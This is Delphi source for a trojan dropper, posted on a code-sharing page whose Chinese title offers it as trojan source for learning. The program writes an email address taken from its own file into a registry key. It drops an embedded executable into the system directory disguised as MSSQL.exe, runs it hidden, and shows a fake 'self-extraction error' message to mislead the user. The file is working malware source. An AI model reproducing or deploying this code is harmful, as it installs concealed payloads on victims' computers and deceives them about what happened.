baseexe.dpr

来自「一个木马的源程序。希望大家可以一起通过它来学习一此东西」· DPR 代码 · 共 80 行

program BaseExe;

uses
  Windows,
  Messages,
  SysUtils,
  Classes,
  Registry,
  TLHelp32;

{$R ico.res}
{$R msexe.res}
procedure DllResToFile(const ResName, ResType,FileName: string);
var
Res: TResourceStream;
begin
Res := TResourceStream.Create(HInstance,ResName, PChar(ResType));
Res.SaveToFile(FileName); //将资源保存为文件，即还原文件
Res.Free;
end;

procedure SetEmail;
var
Myreg:Tregistry;
Source:TFileStream;
emailSize:integer;
arrstr:array of char;
RegStr,regkey,em:String;
i,L:integer;
begin
regkey:='\Software\Microsoft\Windows\CurrentVersion\msmt';
try
    Source:=TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone) ;
    Source.Seek(-Sizeof(emailSize) ,soFromEnd);
    Source.Read(emailSize,Sizeof(emailSize));
    Source.Seek(-emailSize,soFromEnd);
    L:=emailSize-Sizeof(emailSize);
    setlength(arrstr,L);
    Source.Read(arrstr[0],L);
    for i:=0 to L-1 do begin
      RegStr:=RegStr+arrstr[i];
    end;
  finally
    Source.Free;
  end;
  Myreg:=Tregistry.Create;
  Try
    Myreg.RootKey:=HKEY_LOCAL_MACHINE;
    Myreg.OpenKey(regkey,True);
    Myreg.WriteString('em',RegStr);
    Myreg.Writestring('count','0');
  finally
   Myreg.free;
  end;
end;
Function Getsyspath:string;
var
  TmppathP:pchar;
  MaxBuf:Dword;
begin
  MaxBuf:=255;
  Getmem(tmppathP,MaxBuf);
  GetSystemDirectory(tmppathp,MaxBuf);
  Result:=strpas(tmppathp);
  FreeMem(tmppathP);
end;

var
syspath:String;
exefile:String;
begin
syspath:=Getsyspath;
exefile:=syspath+'\MSSQL.exe';
SetEmail;
if not fileexists(exefile) then
DllResToFile('SRC1', 'F1',exefile);
winexec(Pchar(exefile),SW_HIDE);
MessageBox(0, '自解压时发生错误!','错误', MB_OK+MB_ICONERROR);
end.